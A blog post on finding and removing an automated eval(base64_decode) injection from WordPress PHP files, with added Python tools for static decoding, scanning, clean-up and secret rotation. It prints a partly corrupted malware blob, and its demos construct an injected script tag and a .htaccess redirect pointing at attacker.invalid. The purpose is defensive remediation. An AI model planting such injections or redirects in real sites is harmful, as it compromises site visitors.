Yes, that happened to me. I had a pretty old version of WordPress on one website and it got attacked by somebody. From what I could tell it was an automated attack, and it infected most of the .php files belonging to the same user on the hosting account.

How I found out was that when I opened the website in Chrome, a warning was shown instead of the website (screenshot not reproduced here):


Note: You can also run a free external scan via Sucuri, which will tell you whether your website is serving something malicious, and Sucuri also offers a clean-up service. Keep in mind that an external scanner only sees what your server sends to the scanner; an injection that only triggers for certain browsers, referrers or user agents can slip past it, so the manual checks below are still worth doing even after a clean scan.

If the site is infected, the scan report says so (screenshot not reproduced here).

Don’t panic, investigate!

The first thing I did was panic. After panicking for about 5 minutes I realized that I should calm down and start investigating the issue and how many of my websites were affected. I opened all of them in Chrome and only 3 were infected. I opened the source code to see what the code that was causing the problem looked like. Note: DO NOT OPEN THE INFECTED LINK; it can infect your machine (especially if you are on Windows). Read the page source (view-source:) instead of letting the browser load the script.

The injected code was a path to the malware site enclosed in <script> tags. Nothing was shown in Firefox though, which is why I didn't see the problem earlier. I assume Firefox has some built-in protection against scripts from external hosts.

The next step was to open the .php files on my server and find the code that produces the script tag pointing at the external website. It was at the top of the file: a base64-encoded string passed to eval(), which looked like this:

/**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYJF9TRVJWRV
JbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbkk5Y3VybF83
NzcoJHVybCk50ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl8Nz
coJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9zb2NrBlb
l83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRy2tl
dF83NzcoJHVybCk7aWYoJbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICgIGZ1bmNttr
0aW9uIHRyeWN1cmxKCR1cmwpe2lmKGZas1bmN0aW9uXsf2V4aXN0cygnY3Vybyk9PT1mYWxzZSlyZX
R1cm4gZmFsc2U7JGNoID0gYl0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO
2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICg
VUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZ
XN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR
1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZ
nVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmggsdaefhyjhEgsrrgmV0dXJuI
CRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9
wZW4nKT09PWZhsfaXJldHVybiBmYWxzZTskYndfsdyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgK"));?>

If you are on a Linux machine or have Cygwin installed you can decode the string and see what it actually does with the following command (paste the whole string as one argument; base64 -d ignores the line breaks):

echo "ABOVE STRING GOES HERE" | base64 -d

echo only prints the decoded text; nothing is executed, because the output goes to your terminal and never to php. Two caveats: the blob quoted above is not intact (parts of it are no longer valid base64 for the surrounding code) and will not decode cleanly, so use the string from your own infected file; and the decoded output is often just another eval() wrapped around a further base64_decode() or gzinflate() layer, so repeat the decode until you reach readable PHP.
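The decode step above, done statically for any number of nested layers, as an added example that is not part of the original post and not the malware's own code. It also covers the scan in step 2 (find the files carrying the eval(base64_decode("...")) shape) and the clean-up in step 3 (strip the injected prefix). Everything in it is an assumption made for illustration: the decoder list (base64_decode, gzinflate, gzuncompress, str_rot13) is what this kind of injection commonly nests, the file tree and the script URL attacker.invalid are constructed, and nothing ever executes PHP.

```python
"""Static triage for the eval(base64_decode("...")) injection described above.

Nothing here executes PHP: every layer is unwrapped with Python's own base64/zlib,
so the payload is only read, never run."""
import base64
import codecs
import re
import tempfile
import zlib
from pathlib import Path
from typing import List, Optional, Tuple

# Shape of the injected prefix shown in this post: optional <?php, the /**/ marker,
# eval(base64_decode("...")) and the closing ?>.  Newlines inside the quoted string
# are allowed because the blob is usually line-wrapped.
INJECT_RE = re.compile(
    r'(?:<\?php\s*)?/\*\*/\s*eval\s*\(\s*base64_decode\s*\(\s*["\']'
    r'([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)\s*;\s*\?>\s*'
)
# Generic eval(<decoder>(<decoder>("..."))) wrapper used to peel nested layers.  The
# decoder list is an assumption about what this family nests; extend it if needed.
WRAP_RE = re.compile(
    r'eval\s*\(\s*((?:(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(\s*)+)'
    r'["\']([A-Za-z0-9+/=\s]*)["\']'
)
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b),             # whitespace is ignored
    "gzinflate": lambda b: zlib.decompress(b, -zlib.MAX_WBITS),  # raw DEFLATE = PHP gzinflate()
    "gzuncompress": lambda b: zlib.decompress(b),               # zlib-framed = PHP gzuncompress()
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
}


def peel_layers(php: bytes, max_depth: int = 10) -> Tuple[bytes, int, Optional[str]]:
    """Unwrap nested eval(...) layers statically.

    Returns (innermost text, layers removed, error).  A corrupt blob, like the mangled
    one quoted in this post, stops the loop with an error message instead of raising,
    so whatever did decode is still returned."""
    text, layers = php, 0
    for _ in range(max_depth):
        m = WRAP_RE.search(text.decode("latin-1"))
        if not m:
            return text, layers, None
        funcs = re.findall(r"[a-z0-9_]+", m.group(1))   # outermost decoder first
        data = m.group(2).encode("latin-1")
        try:
            for fn in reversed(funcs):                  # innermost decoder runs first
                data = DECODERS[fn](data)
        except (ValueError, zlib.error) as exc:         # binascii.Error is a ValueError
            return text, layers, f"{fn}: {exc}"
        text, layers = data, layers + 1
    return text, layers, "max_depth reached"


def find_infected(root: Path) -> List[Path]:
    """Like `find . | xargs grep -i decode`, but only flags the eval(<decoder>("..."))
    shape, so a plugin's legitimate base64_decode() call is not listed."""
    return sorted(p for p in root.rglob("*.php") if WRAP_RE.search(p.read_text("latin-1")))


def clean_file(path: Path) -> bool:
    """Remove the injected prefix (from /**/ through the trailing ?>), as step 3 does
    by hand.  Returns True if the file was changed."""
    original = path.read_text("latin-1")
    cleaned = INJECT_RE.sub("", original, count=1)
    if cleaned == original:
        return False
    path.write_text(cleaned, "latin-1")
    return True


def build_demo(root: Path) -> None:
    """Write a constructed (not real) infected plugin file plus a clean one."""
    inner = b'echo \'<script src="http://attacker.invalid/x.js"></script>\';'   # placeholder URL
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)                  # PHP gzdeflate()
    layer2 = (b'eval(gzinflate(base64_decode("'
              + base64.b64encode(comp.compress(inner) + comp.flush()) + b'")));')
    blob = base64.b64encode(layer2)
    wrapped = b"\n".join(blob[i:i + 76] for i in range(0, len(blob), 76))      # line-wrapped as in the post
    plugin = root / "wp-content" / "plugins" / "demo"
    plugin.mkdir(parents=True)
    (plugin / "demo.php").write_bytes(b'<?php /**/ eval(base64_decode("' + wrapped
                                      + b'"));?>' + b"<?php\n// original plugin code\n")
    (plugin / "ok.php").write_bytes(b"<?php\n$img = base64_decode($data); // legitimate, no eval\n")


def demo() -> dict:
    """Scan, decode and clean the constructed tree; returns the results for inspection."""
    root = Path(tempfile.mkdtemp())
    build_demo(root)
    infected = find_infected(root)
    payload, layers, err = peel_layers(infected[0].read_bytes())
    changed = [clean_file(p) for p in infected]
    return {
        "infected": [p.relative_to(root).as_posix() for p in infected],
        "payload": payload.decode("latin-1"),
        "layers": layers,
        "error": err,
        "cleaned": all(changed) and not find_infected(root),
        "head": (root / "wp-content/plugins/demo/demo.php").read_text("latin-1")[:5],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Point find_infected() at the backup folder you downloaded, run peel_layers() on each hit to confirm it really is this injection (and to read what it does), and only then let clean_file() strip the prefix. Keep the untouched backup; the cleaner rewrites files in place.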

Make backups

Now that we know what the issue is, make a backup of the website and the database. Don't worry that the files are still infected; it is better to have infected files than no files at all in case something goes badly wrong 🙂

Unless you already have a method for frequent backups, use a simple one now. Delete the themes and plugins you don't use and empty the cache if you use a caching plugin, then log in to your hosting (S/FTP) and copy all the files from the host to your local machine. If your client can preserve file modification times, let it: the timestamps on the infected files tell you when the attack happened. Log in to your database and create a full export (structure and data).

Clean-up

Unless you have Sucuri perform the cleaning for you, here are some manual steps you can take to clean your website.

1. Install a plugin to scan

There is a plugin called Exploit Scanner that scans your WordPress installation. It requires WordPress 3.3+, so if you have something older you will need to skip this step. If you have 3.3+, install it and run a scan (in most cases the default settings are fine); it lists the files that are most likely infected. Some legitimate code uses decode/eval functions too, so focus on the hits that have a long base64-encoded string at the top of the file (as explained above).

When the scan is complete you can see which files are infected and correct them manually.

2. Manually scan all the files

If you are on a Linux machine or have Cygwin on Windows you can run the following to identify which files are infected (the -print0/-0 pair keeps file names with spaces intact, -l prints only file names instead of the huge matching lines):

cd backedup_folder_from_above
find . -type f -name '*.php' -print0 | xargs -0 grep -il decode

This lists every .php file containing the word decode; you will recognize the infection by the base64-encoded string passed to eval() at the top of the file. If you are not sure about a file, decode its string with the echo method explained above.

3. Manually remove the infected code

Now that we have identified the infected files (either with the plugin or the manual scan), it is time to clean up the website. Edit each infected file and delete the injected statement: everything from /**/ through the ?> that follows the encoded string, so that the file's own <?php opening tag is the first thing in the file again (check that exactly one <?php remains at the top). If you edit the local copies, upload them to the server at the correct paths and overwrite the existing files when you are done. The easier way is to open the files directly from the server (via your FTP client), edit them and save the changes.

When you are done with all the files and they are uploaded to your server, run another scan with Exploit Scanner and/or the manual scan (for the second manual scan, download a fresh copy of the entire website into a new local folder and scan that, not the old backup). Make sure no infected files are left. Keep in mind that eval/base64 is only the pattern this particular infection used; also look for .php files you don't recognize (for example inside wp-content/uploads), because a single leftover backdoor is enough to get the site reinfected.

Final steps

Now that the site is clean, there are some final steps that you must perform to avoid problems like this in the future.

  1. Update your WordPress installation to the latest version
  2. Update all your plugins, or at least the active ones (and delete inactive ones, since their files are still reachable on the server)
  3. Update your theme (note that some themes overwrite your custom code when updated)
  4. Change the WordPress secret keys and salts in your wp-config.php file (the generator at https://api.wordpress.org/secret-key/1.1/salt/ gives you a fresh set); this invalidates every existing login cookie, including any the attacker may hold
  5. Change the passwords for all WordPress users and make sure no new users have been created
  6. Change the database password(s) and update the password in wp-config.php as well
  7. Make sure the .htaccess file in the root directory of your blog has not been modified. Unless you have changed it yourself, it should look like this:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Note: your hosting provider, plugins etc. may have added something else here, so double-check before modifying it.
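Two of the final steps (checking .htaccess against the stock block, and rotating the secret keys in wp-config.php) as an added example; this is not the post's own code and not WordPress code. It assumes the stock .htaccess block quoted above, the eight key/salt names WordPress defines in wp-config.php, and generates the new values locally with the OS random generator instead of fetching them from the WordPress salt service; the tampered .htaccess and the config fragment in demo() are constructed inputs, and attacker.invalid is a placeholder.

```python
"""Final-step checks: is .htaccess still the stock WordPress block, and rotate the
eight secret keys/salts in wp-config.php."""
import re
import secrets
import string
from typing import List, Tuple

# The stock block quoted in the post, used as the reference.
STOCK_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
"""
SECRET_NAMES = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
                "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
# define( 'AUTH_KEY', '...' ) with any spacing; group 1 is everything up to the value,
# group 2 the closing parenthesis.
SECRET_RE = re.compile(r"(define\(\s*'(?:" + "|".join(SECRET_NAMES) + r")'\s*,\s*)'[^']*'(\s*\))")


def _lines(text: str) -> List[str]:
    return [ln.strip() for ln in text.splitlines() if ln.strip()]


def htaccess_extra_lines(content: str) -> List[str]:
    """Every non-blank line of .htaccess that is not in the stock block.

    An empty list means the file is the stock block (ignoring whitespace).  Anything
    else deserves a look before you delete it: hosts and plugins add lines here, but
    so do attackers (conditional RewriteRules to another site, php_value
    auto_prepend_file pointing at a dropped file, and so on)."""
    stock = set(_lines(STOCK_HTACCESS))
    return [ln for ln in _lines(content) if ln not in stock]


def new_secret(length: int = 64) -> str:
    """64 printable characters from the OS CSPRNG (the length the WordPress salt
    service uses).  Single quote and backslash are excluded so the value can sit in a
    PHP single-quoted string without escaping."""
    alphabet = [c for c in string.ascii_letters + string.digits + string.punctuation
                if c not in "'\\"]
    return "".join(secrets.choice(alphabet) for _ in range(length))


def rotate_secrets(config: str) -> Tuple[str, int]:
    """Replace the value of every define('AUTH_KEY', ...) style line in wp-config.php
    text.  Returns (new text, number of defines rewritten).  Saving the result logs
    every user out, the attacker's stolen cookies included."""
    count = 0

    def repl(m):
        nonlocal count
        count += 1
        return f"{m.group(1)}'{new_secret()}'{m.group(2)}"

    return SECRET_RE.sub(repl, config), count


def demo() -> dict:
    """Constructed inputs: a .htaccess with a referrer-based redirect added (a common
    way attackers abuse this file) and a wp-config.php fragment with default keys."""
    tampered = STOCK_HTACCESS.replace(
        "RewriteEngine On",
        "RewriteEngine On\nRewriteCond %{HTTP_REFERER} google [NC]\n"
        "RewriteRule .* http://attacker.invalid/ [R,L]")
    config = "\n".join(f"define( '{n}', 'put your unique phrase here' );" for n in SECRET_NAMES)
    config += "\ndefine( 'DB_PASSWORD', 'oldpass' );\n"
    rotated, n = rotate_secrets(config)
    values = [m.group(0).split("'")[3] for m in SECRET_RE.finditer(rotated)]
    return {
        "extra": htaccess_extra_lines(tampered),
        "rotated": n,
        "defaults_left": rotated.count("put your unique phrase here"),
        "db_untouched": "define( 'DB_PASSWORD', 'oldpass' );" in rotated,
        "all_unique_64": len(set(values)) == len(SECRET_NAMES) and all(len(v) == 64 for v in values),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run htaccess_extra_lines() on the real file before touching it and decide line by line what is yours, your host's, or the attacker's. rotate_secrets() only rewrites the eight key/salt defines; the database password on line 6 of the list is a separate change you make in both the database and wp-config.php.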

After you have done all these steps, go to Sucuri again and re-scan your site to make sure that everything is gone. If you are clean, the report should say so (screenshot not reproduced here).

That would be all; now go and write some posts on your clean blog 🙂